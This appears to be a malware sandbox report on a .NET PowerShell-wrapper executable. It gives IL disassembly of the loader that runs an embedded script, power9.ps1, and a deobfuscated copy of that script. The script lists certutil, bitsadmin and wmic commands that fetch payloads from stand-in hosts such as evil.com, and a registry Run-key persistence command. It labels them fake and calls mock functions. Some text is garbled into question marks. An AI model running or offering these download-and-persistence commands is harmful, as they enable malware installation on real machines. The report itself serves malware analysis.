System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_15 ldloc.s V_15 ldstr power9.ps1 callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_16 ldloc.s V_16 call System.Text.Encoding System.Text.Encoding::get_UTF8() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream,System.Text.Encoding) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_18 ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_027D: ldloc.s V_11 ldloc.2 <null> ldloc.s V_18 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldc.i4.0 <null> stloc.s V_28 leave IL_05CA: ldloc.s V_28 ldloc.s V_11 brfalse.s IL_02F0: ldloc.s V_5 ldloc.s V_5 ldc.i4.s 9 newarr System.String stloc.s V_33 ldloc.s V_33 ldc.i4.0 <null> ldstr function stelem.ref <null> ldloc.s V_33 ldc.i4.1 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_33 ldc.i4.2 <null> ldstr { stelem.ref <null> ldloc.s V_33 ldc.i4.3 <null> ldloc.s V_18 stelem.ref <null> ldloc.s V_33 ldc.i4.4 <null> ldstr }; Get-Help stelem.ref <null> ldloc.s V_33 ldc.i4.5 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_33 ldc.i4.6 <null> ldstr stelem.ref <null> ldloc.s V_33 ldc.i4.7 <null> ldloc.s V_12 stelem.ref <null> ldloc.s V_33 ldc.i4.8 <null> ldstr | Out-String stelem.ref <null> ldloc.s V_33 call System.String System.String::Concat(System.String[]) callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> br.s IL_02FA: leave.s IL_0308 ldloc.s V_5 ldloc.s V_18 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> leave.s IL_0308: leave.s IL_0316 ldloc.s V_17 brfalse.s IL_0307: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0316: ldloc.s V_11 ldloc.s V_16 brfalse.s IL_0315: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_11 brtrue IL_0515: ldloc.s V_5 ldnull <null> stloc.s V_19 ldstr ^-([^: ]+)[ :]?([^:]*)$ newobj System.Void System.Text.RegularExpressions.Regex::.ctor(System.String) stloc.s V_20 ldloc.s V_9 stloc.s V_21 br IL_04E3: ldloc.s V_21 ldloc.s V_20 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> callvirt System.Text.RegularExpressions.Match System.Text.RegularExpressions.Regex::Match(System.String) stloc.s V_22 ldloc.s V_22 callvirt System.Boolean System.Text.RegularExpressions.Group::get_Success() brfalse IL_04BA: ldloc.s V_19 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() callvirt System.Int32 System.Text.RegularExpressions.GroupCollection::get_Count() ldc.i4.3 <null> bne.un IL_04BA: ldloc.s V_19 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> ldloca.s V_23 call System.Boolean System.Double::TryParse(System.String,System.Double&) brtrue IL_04BA: ldloc.s V_19 ldloc.s V_19 brfalse.s IL_037E: ldloc.s V_22 ldloc.s V_5 ldloc.s V_19 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::Trim() ldstr call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_03BA: ldloc.s V_22 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() stloc.s V_19 br IL_04DD: ldloc.s V_21 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_03FB: ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $TRUE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0423: ldloc.s V_22 ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.1 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br IL_04DD: ldloc.s V_21 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0464: ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $FALSE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0489: ldloc.s V_5 ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.0 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br.s IL_04DD: ldloc.s V_21 ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br.s IL_04DD: ldloc.s V_21 ldloc.s V_19 brfalse.s IL_04D1: ldloc.s V_5 ldloc.s V_5 ldloc.s V_19 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br.s IL_04DD: ldloc.s V_21 ldloc.s V_5 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddArgument(System.Object) pop <null> ldloc.s V_21 ldc.i4.1 <null> add <null> stloc.s V_21 ldloc.s V_21 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0335: ldloc.s V_20 ldloc.s V_19 brfalse.s IL_04FB: ldloc.s V_5 ldloc.s V_5 ldloc.s V_19 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_5 ldstr Out-String callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddCommand(System.String) pop <null> ldloc.s V_5 ldstr Stream callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_5 ldloc.s V_6 ldloc.s V_8 ldnull <null> ldloc.s V_26 brtrue.s IL_052F: ldloc.s V_26 ldloc.s V_27 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::<Main>b__2(System.IAsyncResult) newobj System.Void System.AsyncCallback::.ctor(System.Object,System.IntPtr) stloc.s V_26 ldloc.s V_26 ldnull <null> callvirt System.IAsyncResult System.Management.Automation.PowerShell::BeginInvoke<System.String,System.Management.Automation.PSObject>(System.Management.Automation.PSDataCollection`1<System.String>,System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>,System.Management.Automation.PSInvocationSettings,System.AsyncCallback,System.Object) pop <null> ldloc.0 <null> callvirt System.Boolean ModuleNameSpace.MainApp::get_ShouldExit() brtrue.s IL_0550: ldloc.s V_5 ldloc.s V_27 ldfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass6::mre ldc.i4.s 100 callvirt System.Boolean System.Threading.WaitHandle::WaitOne(System.Int32) brfalse.s IL_0538: ldloc.0 ldloc.s V_5 callvirt System.Void System.Management.Automation.PowerShell::Stop() ldloc.s V_5 callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Management.Automation.PSInvocationState System.Management.Automation.PSInvocationStateInfo::get_State() ldc.i4.5 <null> bne.un.s IL_0583: leave.s IL_0591 ldloc.s V_27 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass6::ui ldloc.s V_5 callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Exception System.Management.Automation.PSInvocationStateInfo::get_Reason() callvirt System.String System.Exception::get_Message() callvirt System.Void System.Management.Automation.Host.PSHostUserInterface::WriteErrorLine(System.String) leave.s IL_0591: ldloc.s V_4 ldloc.s V_5 brfalse.s IL_0590: endfinally ldloc.s V_5 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Close() leave.s IL_05A6: leave.s IL_05AB ldloc.s V_4 brfalse.s IL_05A5: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_05AB: ldloc.1 pop <null> leave.s IL_05AB: ldloc.1 ldloc.1 <null> brfalse.s IL_05C3: ldloc.0 ldstr Click OK to exit... call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String) pop <null> ldloc.0 <null> callvirt System.Int32 ModuleNameSpace.MainApp::get_ExitCode() ret <null> ldloc.s V_28 ret <null> |
|
Name0 | Value |
|---|---|
| PE Layout | MemoryMapped (process dump suspected) |
| Deobfuscated PowerShell | @("certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\Windows\Temp\payload.exe", "bitsadmin /transfer myjob /download /priority normal http://evil.com/backdoor.exe C:\temp\svchost.exe", "wmic process get brief /format:"http://malicious-server.com/trojan.xsl"", "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\malware.exe" /f") foreach ($cmd in $suspiciousCommands) { Write-Host "[FAKE CMD] $cmd" -ForegroundColor "DarkYellow" } Write-Host "[!] ???????????????????????????? CMD ?????????????? '??????????????????'" -ForegroundColor "Red" disable-antivirusmock add-totaskschedulermock new-fakesystemfolder new-fakesvchost encrypt-fakefolder fake-miner rename-tosvchost invoke-suspiciouscmd Write-Host " [???????????????????????? ??????????????????] ?????? ??????-?????????????? ??????????????????!" -ForegroundColor "White" -BackgroundColor "DarkGreen" |
| PE Layout | MemoryMapped (process dump suspected) |
|
Name0 | Value | Location |
|---|---|---|
| PE Layout | MemoryMapped (process dump suspected) |
3317bedd596b80004b8a06aaf63c912e |
| Deobfuscated PowerShell | @("certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\Windows\Temp\payload.exe", "bitsadmin /transfer myjob /download /priority normal http://evil.com/backdoor.exe C:\temp\svchost.exe", "wmic process get brief /format:"http://malicious-server.com/trojan.xsl"", "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\malware.exe" /f") foreach ($cmd in $suspiciousCommands) { Write-Host "[FAKE CMD] $cmd" -ForegroundColor "DarkYellow" } Write-Host "[!] ???????????????????????????? CMD ?????????????? '??????????????????'" -ForegroundColor "Red" disable-antivirusmock add-totaskschedulermock new-fakesystemfolder new-fakesvchost encrypt-fakefolder fake-miner rename-tosvchost invoke-suspiciouscmd Write-Host " [???????????????????????? ??????????????????] ?????? ??????-?????????????? ??????????????????!" -ForegroundColor "White" -BackgroundColor "DarkGreen" Malicious |
3317bedd596b80004b8a06aaf63c912e > .Net Resources > power9.ps1 > [PowerShell Command] |
| PE Layout | MemoryMapped (process dump suspected) |
3317bedd596b80004b8a06aaf63c912e > [Rebuild from dump]_fc09bf1c.exe |